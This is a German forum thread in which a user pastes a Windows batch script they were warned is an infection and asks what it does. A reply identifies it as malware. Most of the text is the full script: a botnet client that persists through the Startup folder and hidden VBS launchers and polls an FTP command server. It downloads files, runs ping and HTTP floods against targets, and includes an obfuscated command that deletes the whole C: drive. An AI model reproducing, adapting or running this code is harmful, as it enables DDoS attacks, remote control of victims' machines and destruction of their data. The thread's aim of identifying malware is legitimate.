WinFuture-Forum.de: Was macht diese Batch? - WinFuture-Forum.de

Zum Inhalt wechseln

Nachrichten zum Thema: Entwicklung
Seite 1 von 1

Was macht diese Batch? Ich verstehe nicht genau, was die Batch macht.


#1 Mitglied ist offline   Leislolle 

  • Gruppe: Mitglieder
  • Beiträge: 1
  • Beigetreten: 01. April 20
  • Reputation: 0

geschrieben 01. April 2020 - 08:40

Man hat mir gesagt, dass diese Batch eine Infection sein müsste ich habe sie aber nicht ausgeführt möchte aber doch gerne wissen Wie man diese Infection stopen kann. Mit Freundlichen Grüssen Leislolle | Flo

@echo off
color 08
title IFTP

::Bot
set botfile=quake.bat
set vanishfile=quake.vbs
set botcountfile=botcount
set channel=quakenetsh
set prefix=IDIOT
set startfile=defender.bat
set version=0.1
set DNA=temp

::bot script
:check
set cdbot=%cd%
cd %userprofile%\AppData\Roaming
if not exist %DNA% md %DNA%
cd %DNA%
if not exist Network md Network
cd Network
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo get %botfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

if not exist %vanishfile% echo CreateObject("Wscript.Shell").Run "%botfile%", 0, False > %vanishfile%

if exist edge.windows set /p botname= < edge.windows

if not exist edge.windows goto setbotname

cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

if not exist %bratfile% (
echo @echo off
echo title IFTP
echo cd %userprofile%\AppData\Roaming\%DNA%\Network
echo if exist %vanishfile% start %vanishfile%
echo exit
) > %startfile%

cd %userprofile%\AppData\Roaming\%DNA%\Network

if not exist s4ve.q echo saved > s4ve.q &&start %vanishfile% &&exit

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

set message=has joined
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
goto command_loader


set /a num1=%random% %% 9
set /a num2=%random% %% 9
set /a num3=%random% %% 99
set /a num4=%random% %% 9
set /a num5=%random% %% 9
set /a num6=%random% %% 9
set /a num7=%random% %% 99
set /a num8=%random% %% 9

if %num1%==0 set bot_num1=N
if %num1%==1 set bot_num1=Q
if %num1%==2 set bot_num1=S
if %num1%==3 set bot_num1=F
if %num1%==4 set bot_num1=T
if %num1%==5 set bot_num1=U
if %num1%==6 set bot_num1=V
if %num1%==7 set bot_num1=K
if %num1%==8 set bot_num1=X
if %num1%==9 set bot_num1=J

if %num4%==0 set bot_num4=N
if %num4%==1 set bot_num4=Q
if %num4%==2 set bot_num4=S
if %num4%==3 set bot_num4=F
if %num4%==4 set bot_num4=T
if %num4%==5 set bot_num4=U
if %num4%==6 set bot_num4=V
if %num4%==7 set bot_num4=K
if %num4%==8 set bot_num4=X
if %num4%==9 set bot_num4=J

if %num6%==0 set bot_num6=N
if %num6%==1 set bot_num6=Q
if %num6%==2 set bot_num6=S
if %num6%==3 set bot_num6=F
if %num6%==4 set bot_num6=T
if %num6%==5 set bot_num6=U
if %num6%==6 set bot_num6=V
if %num6%==7 set bot_num6=K
if %num6%==8 set bot_num6=X
if %num6%==9 set bot_num6=J

if %num8%==0 set bot_num8=N
if %num8%==1 set bot_num8=Q
if %num8%==2 set bot_num8=S
if %num8%==3 set bot_num8=F
if %num8%==4 set bot_num8=T
if %num8%==5 set bot_num8=U
if %num8%==6 set bot_num8=V
if %num8%==7 set bot_num8=K
if %num8%==8 set bot_num8=X
if %num8%==9 set bot_num8=J
set botname=%bot_num1%%num2%%num3%%bot_num4%%bot_num6%%num7%%bot_num8%
echo %botname% > edge.windows
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=has joined
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo get %botcountfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows


set /p botcount= < %botcountfile%
set /a botcount=%botcount%+1

echo %botcount% > %botcountfile%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo put %botcountfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del %botcountfile%
goto check


:command_loader
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.command
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

set /p loading_cm= < input.command
del input.command

if %loading_cm%==PERL_HTTP-NULL set method=HTTP-NULL &&goto HTTP-NULL

if %loading_cm%==ICMP set method=ICMP &&goto POD
if %loading_cm%==QUAKE set method=QUAKE &&goto POD
if %loading_cm%==VOICE set method=VOICE &&goto POD
if %loading_cm%==GLOCK set method=GLOCK &&goto POD

if %loading_cm%==update goto update
if %loading_cm%==status goto Checkstatus
if %loading_cm%==botcount goto howmanybots
if %loading_cm%==kill.bots goto kill_bots
if %loading_cm%==get goto get_file
if %loading_cm%==get%botname% goto get_file
if %loading_cm%==kill%botname% goto kill_bots
if %loading_cm%==desstroy goto desstroy_system
if %loading_cm%==desstroy%botname% goto desstroy_system
if %loading_cm%==delete goto delete_file
if %loading_cm%==start goto start_file
goto command_loader

:desstroy_system
set dse1=R
set dse2=D C:\ 
set dse3=/S 
set dse4=/Q
%dse1%%dse2%%dse3%%dse4%
goto command_loader

:POD
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p target=
set /p threads=
set /p conns=
set /p proxy=
set /p proxylist=
set /p sec=
)
set message=I'm dropping a %method% bomb on %target%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del input.attack
del #%channel%

:podloop
set /a packet=%random% %% 8000
if %method%==QUAKE set size=%packet%
if %method%==ICMP set size=65500
if %method%==VOICE set size=5000
if %method%==GLOCK set size=15000

ping %target% -l %size% -w 1 -4 -n 1 | FIND "TTL="
if %sec%==0 goto attack_stop
set /a sec=%sec%-1
goto podloop

:attack_stop
(
echo localhost
echo 0
echo 0
echo 0
echo 0 
echo 0 
) > input.attack

echo none > input.command

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo put input.command
echo put input.attack
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
goto command_loader

:installproxielist
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/buildingblocks
echo get %proxylist%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
goto backpointinstallproxielist

:HTTP-NULL
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo cd /%folder%/buildingblocks
echo get %method%.pl
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p target=
set /p threads=
set /p conns=
set /p proxy=
set /p proxylist=
set /p time=
)
set message=[SLURRG! UFO dropping %conns% aliens they attacking the TARGET %target%]
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del input.attack
del #%channel%

if not exist %proxylist% goto installproxielist
:backpointinstallproxielist

(
echo @echo off
echo perl %method%.pl http://%target% %threads% %conns% proxy=%proxy% proxylist=%proxylist%
echo exit
) > %method%.bat
echo CreateObject("Wscript.Shell").Run "%method%.bat", 0, False > %method%.vbs
start %method%.vbs
set /a time=%time%+5
ping 127.0.0.1 -l 35 -n %time% > nul
taskkill /f /im perl.exe
del %method%.bat
del %method%.vbs

(
echo localhost
echo 0
echo 0
echo 0
echo 0 
echo 0 
) > input.attack

echo none > input.command

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo put input.command
echo put input.attack
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

goto command_loader

::Update infection
:update
shutdown /r
goto command_loader

::Check status
:Checkstatus
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Status=Version:%version% Infection:%start_file% DNA:%DNA%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Delete file
:delete_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
set message=%filename% deleted
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
if exist %filename% del %filename%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Start file
:start_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=%filename% started
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
if exist %filename% start %filename%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Get file
:get_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/buildingblocks
echo get %filename%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Get %filename%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Kill bot/s
:kill_bots
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Killed
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del %botfile%
del %vanishfile%
ipconfig /renew
ipconfig /release
exit

0

Anzeige



#2 Mitglied ist offline   CaNNoN 

  • Gruppe: aktive Mitglieder
  • Beiträge: 340
  • Beigetreten: 16. November 05
  • Reputation: 48

geschrieben 01. April 2020 - 13:47

im wesentlichen baut das teil einen irc bot, der dann fuer div. DDoS und/oder irc-floods verwendet wird - soweit ich das ueberflogen habe werden noch kleinere aenderungen an der windows firewall vorgenommen und via ftp etwas nachgeladen.

definitiv malware.
2

Thema verteilen:


Seite 1 von 1

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0